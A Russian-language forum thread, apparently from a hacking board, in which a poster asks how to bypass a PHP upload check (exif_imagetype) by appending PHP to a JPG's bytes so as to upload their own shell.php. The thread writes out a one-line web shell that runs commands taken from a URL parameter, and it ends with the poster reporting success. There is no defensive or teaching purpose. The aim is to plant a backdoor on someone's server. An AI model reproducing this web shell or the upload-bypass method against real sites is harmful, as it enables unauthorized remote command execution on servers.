Всем привет. Народ, нужна помощь) есть форма для закидывания файлов. Стоит проверка, что это именно картинка, а не фигня переименованная, с помощью exif_imagetype(). Собственно, нужно это обойти и залить свой shell.php. И да, формат должен быть JPG. Погуглив, узнал следующее: в каждом файле есть "магические числа" - определённая сигнатура, которая и определяет данный файл. Т.е. если вы переименуете файл в *.JPG, то картинкой он от этого не станет. Более того, делается это побайтово. Как я понимаю, нужно использовать hex Editor, дописав с его помощью в картинку в конец данные php-кода моего, не изменив при этом первые биты. Собственно, вопрос. Кто может привести пример, инструкцию, как это делать? P.S. Собственно, пришёл к такому: Как побитово добавить php код в конец jpg картинки? <?php passthru ($_GET['cmd']); ?>
м.. да, это я всё уже читал по несколько раз) Говорю же, мне нужна инструкция, как именно дописывать код в картинку. Потому что обычный текстовым редактором мы попортим первые биты, как раз являющиеся магическим числом. И да, то ли я .., то ли лыжи не едут. Но я не нашёл "exif" в данном посте. Но аналогичный случай там есть, но там просто говорится, что нужно дописать код в картинку. А я хочу узнать - как =) Но спасибо за ссылку, она полезна для темы обхода проверки картинок.
разобрался, всё получилось. Завтра на свежую голову накатаю новую тему с подробным описанием что как делать, а сюда кину ссылку на неё.